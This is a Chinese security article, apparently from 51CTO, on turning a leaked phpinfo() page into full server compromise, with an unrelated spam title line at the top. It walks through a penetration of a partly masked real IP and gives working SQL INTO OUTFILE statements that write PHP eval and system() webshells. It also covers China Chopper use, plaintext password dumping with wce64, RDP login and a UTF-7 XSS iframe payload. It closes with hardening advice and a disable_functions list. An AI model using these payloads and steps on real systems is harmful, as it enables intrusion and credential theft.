自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

PHPInfo()信息泄漏漏洞利用提權(quán)及防范

原創(chuàng)
安全 漏洞 應(yīng)用安全
PHPInfo()函數(shù)主要用于網(wǎng)站建設(shè)過程中測試搭建的PHP環(huán)境是否正確,很多網(wǎng)站在測試完畢后并沒有及時刪除,因此當訪問這些測試頁面時,會輸出服務(wù)器的關(guān)鍵信息,這些信息的泄露將導(dǎo)致服務(wù)器被滲透的風(fēng)險。

PHPInfo函數(shù)信息泄露漏洞常發(fā)生一些默認的安裝包,比如phpstudy等,默認安裝完成后,沒有及時刪除這些提供環(huán)境測試的文件,比較常見的為phpinfo.php、1.php和test.php,雖然通過phpinfo獲取的php環(huán)境以及變量等信息,但這些信息的泄露配合一些其它漏洞將有可能導(dǎo)致系統(tǒng)被滲透和提權(quán)。

1.1phpinfo函數(shù)

PHP中提供了PHPInfo()函數(shù),該函數(shù)返回 PHP 的所有信息,包括了 PHP 的編譯選項及擴充配置、PHP 版本、服務(wù)器信息及環(huán)境變量、PHP 環(huán)境變量、操作系統(tǒng)版本信息、路徑及環(huán)境變量配置、HTTP 標頭、及版權(quán)宣告等信息。其函數(shù)定義如下:

語法: int phpinfo(void);

返回值: 整數(shù)

函數(shù)種類: PHP 系統(tǒng)功能

例如新建一個php文件,在其中輸入以下內(nèi)容:

  1. <?php phpinfo(); ?> 

1.2phpinfo信息泄露

該函數(shù)主要用于網(wǎng)站建設(shè)過程中測試搭建的PHP環(huán)境是否正確,很多網(wǎng)站在測試完畢后并沒有及時刪除,因此當訪問這些測試頁面時,會輸出服務(wù)器的關(guān)鍵信息,這些信息的泄露將導(dǎo)致服務(wù)器被滲透的風(fēng)險。

  1. <html>
  2.  <head> 
  3. <META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"
  4. </head> 
  5. <body> 
  6. <iframe src="http://域名/phpinfo.php? ADw-SCRIPT AD4-alert(document.domain); ADw-/SCRIPT AD4-=1"

1.3一個有phpinfo泄露滲透的實例

1.分析phpinfo函數(shù)暴露出來的有用信息

從網(wǎng)站phpInfo.php程序運行的結(jié)果中我們可以獲取以下有用的信息:

(1)操作系統(tǒng)為Windows2008 Server或者Windows7: Windows NT BNKUMDFI 6.1 build 7601

(2)服務(wù)器使用了Apache 2.4,這意味著如果拿到Webshell后99%可以提權(quán)成功,Apache在Windows環(huán)境下權(quán)限極高,默認為System權(quán)限。

(3)網(wǎng)站默認路徑:D:/WWW 通過mssql或者mysql直接導(dǎo)入一句話需要知道網(wǎng)站真實路徑,這個出來就很好辦了。

PHPInfo()信息泄漏漏洞利用提權(quán)及防范

圖1獲取有用信息

2.查看泄露文件

對根目錄進行訪問,如圖2所示,發(fā)現(xiàn)有mail.rar以及三個文件目錄,其中有一個phpMyAdmin,這個是mysql的php管理,有這個只要獲取數(shù)據(jù)庫密碼即可導(dǎo)入導(dǎo)出數(shù)據(jù),包括導(dǎo)出一句話后門。對其中的壓縮文件進行下載,并查看其中的數(shù)據(jù)庫配置文件。

PHPInfo()信息泄漏漏洞利用提權(quán)及防范

圖2查看泄露的其它文件

3.獲取數(shù)據(jù)庫口令

在mail文件夾下,發(fā)現(xiàn)數(shù)據(jù)庫連接文件為connect.php文件,打開后獲取數(shù)據(jù)庫的用戶和密碼,數(shù)據(jù)庫用戶為root,密碼為空。

PHPInfo()信息泄漏漏洞利用提權(quán)及防范

圖3獲取數(shù)據(jù)庫用戶帳號和密碼

4.連接并查看數(shù)據(jù)庫

如圖4所示,在瀏覽器中打開http://183.***.160.***:5555/phpMyAdmin/,輸入剛才獲取的帳號,直接登錄,登錄后可以查看其所有數(shù)據(jù)庫。

PHPInfo()信息泄漏漏洞利用提權(quán)及防范

圖4登錄并查看數(shù)據(jù)庫

5.導(dǎo)出一句話后門到服務(wù)器

目前導(dǎo)出一句話后門的方法有以下幾種:

(1)創(chuàng)建表方式

  1. CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );  
  2. INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES ('<?php @eval($_POST[pass]);?>');  
  3. SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE 'd:/www/exehack.php';  
  4. DROP TABLE IF EXISTS `darkmoon`;  

上面代碼是在mysql數(shù)據(jù)庫中創(chuàng)建darkmoon表,然后加入一個名字為darkmoon1的字段,并在darkmoon1的字段中插入一句話代碼,然后從darkmoon1字段里面導(dǎo)出一句話到網(wǎng)站的真實路徑“d:/www/exehack.php”,最后就是刪除darkmoon這個表,執(zhí)行效果如圖5所示。

PHPInfo()信息泄漏漏洞利用提權(quán)及防范

圖5執(zhí)行導(dǎo)出一句話sql腳本程序

注意:在使用以上代碼時必須選擇mysql數(shù)據(jù)庫,并在phpMyAdmin中選擇SQL,然后執(zhí)行以上代碼即可。需要修改的地方是網(wǎng)站的真實路徑和文件名稱“d:/www/exehack.php”

(2)直接導(dǎo)出一句話后門文件

  1. select '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/www/p.php' 

如果顯示結(jié)果類似“您的 SQL 語句已成功運行 ( 查詢花費 0.0006 秒 )”表明后門文件生成成功。

(3)直接執(zhí)行命令權(quán)限的shell

  1. select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'd:/www/cmd.php' 

該方法導(dǎo)出成功后可以直接執(zhí)行DOS命令,使用方法:www.xxx.com/cmd.php?cmd=(cmd=后面直接執(zhí)行dos命令),如圖6所示。

PHPInfo()信息泄漏漏洞利用提權(quán)及防范

圖6導(dǎo)入可以執(zhí)行命令的webshell

6.獲取webshell

對導(dǎo)出的webshell在網(wǎng)站進行訪問測試,如圖7所示,如果沒有顯示錯誤,則表示可以運行,在中國菜刀一句話后門管理中添加該地址直接獲取webshell,如圖8所示。

PHPInfo()信息泄漏漏洞利用提權(quán)及防范

圖7測試導(dǎo)出的webshell

PHPInfo()信息泄漏漏洞利用提權(quán)及防范

圖8獲取webshell

7.服務(wù)器提權(quán)

通過中國菜刀隊遠程終端命令,直接在其中執(zhí)行命令,如圖9所示,可以查看是否開啟3389端口,系統(tǒng)當前用戶的權(quán)限是系統(tǒng)權(quán)限,查看當前都有什么用戶。上傳wce64.exe并執(zhí)行“wce64 -w”獲取當前登錄明文密碼。

PHPInfo()信息泄漏漏洞利用提權(quán)及防范

圖9執(zhí)行命令

PHPInfo()信息泄漏漏洞利用提權(quán)及防范

圖10獲取系統(tǒng)管理員密碼

8.登錄3389

在本地打開mstsc.exe直接輸入用戶名和密碼進行登錄,如圖11所示成功登錄該服務(wù)器。

PHPInfo()信息泄漏漏洞利用提權(quán)及防范

圖10成功登錄該服務(wù)器

9.總結(jié)

系統(tǒng)一個小小的失誤,再加上一些偶然的因素,就導(dǎo)致一個系統(tǒng)被滲透,并獲取了服務(wù)器權(quán)限,因此phpinfo.php信息泄露不可忽略。phpinfo信息泄露還可以進行跨站攻擊,將以下代碼保存為1.html.

10.防范方法

(1)通過修改服務(wù)器環(huán)境內(nèi)php.ini文件,將“expose_php = On”修改成“expose_php = Off”然后重啟php即可。

(2)如果確實需要該測試信息,在測試時使用,測試完畢后將該文件刪除掉。

(3)若無需要可以將一些php的危險函數(shù)禁用,打開/etc/php.ini文件,查找到 disable_functions,添加需禁用的以下函數(shù)名:

phpinfo,eval,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,

proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,

symlink,popepassthru,stream_socket_server,fsocket,fsockopen

責(zé)任編輯:藍雨淚 來源: 51CTO.com
相關(guān)推薦

2023-06-11 17:24:26

2017-04-07 09:46:16

2017-04-17 20:08:19

2021-05-01 20:52:30

漏洞網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2013-11-29 15:34:00

2013-01-22 11:31:00

2015-03-13 10:06:55

2019-12-01 22:34:42

提權(quán)web安全漏洞

2020-10-06 13:58:25

漏洞

2010-12-10 15:23:49

Linux漏洞

2020-11-16 10:55:41

Windows

2022-03-10 09:41:15

漏洞Linux內(nèi)核

2017-03-15 10:00:15

2015-05-27 11:31:32

Apache HBas信息泄漏漏洞

2012-11-21 14:39:34

2023-10-09 18:22:35

2014-08-27 16:02:53

2011-03-07 11:36:23

FileZillaSe

2013-08-06 17:27:56

2023-03-30 09:53:57

點贊
收藏

51CTO技術(shù)棧公眾號